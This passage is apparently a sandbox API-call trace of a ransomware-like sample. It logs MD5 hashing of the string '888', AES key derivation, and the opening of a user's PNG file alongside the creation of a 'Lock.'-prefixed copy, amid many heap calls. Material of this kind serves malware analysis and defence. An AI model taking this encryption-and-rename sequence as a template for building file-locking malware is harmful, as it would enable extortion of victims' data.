[0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.704] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.704] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0211.705] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.705] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.706] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.707] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.707] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.707] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0211.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0211.707] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.707] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0211.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0211.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6e80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0211.708] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bd58) returned 1 [0211.709] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0211.709] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0211.709] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.709] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.709] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0211.709] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0211.709] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.709] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.709] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.709] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.709] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.709] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.709] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.709] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.709] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.709] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.709] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab1d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0211.710] CryptCreateHash (in: hProv=0xa7bd58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0211.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.710] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0211.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.710] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.710] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.710] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0211.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab428, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0211.710] CryptHashData (hHash=0x9e1cb8, pbData=0x2a71d18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0211.710] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.710] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.710] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.710] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.710] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab2d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0211.711] CryptDeriveKey (in: hProv=0xa7bd58, Algid=0x6601, hBaseData=0x9e1cb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1db8) returned 1 [0211.711] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.711] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0211.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0211.711] CryptDestroyHash (hHash=0x9e1cb8) returned 1 [0211.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/v1scJjcpwcvzTSqU.png" (normalized: "c:\\users\\fd1hvy\\pictures\\v1scjjcpwcvztsqu.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0211.713] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.713] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0211.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0211.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0211.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.713] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0211.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0211.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a73980 [0211.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.715] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0211.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0211.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a930 [0211.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.716] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.v1scJjcpwcvzTSqU.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.v1scjjcpwcvztsqu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0211.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0211.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.717] PeekMessageW (in: 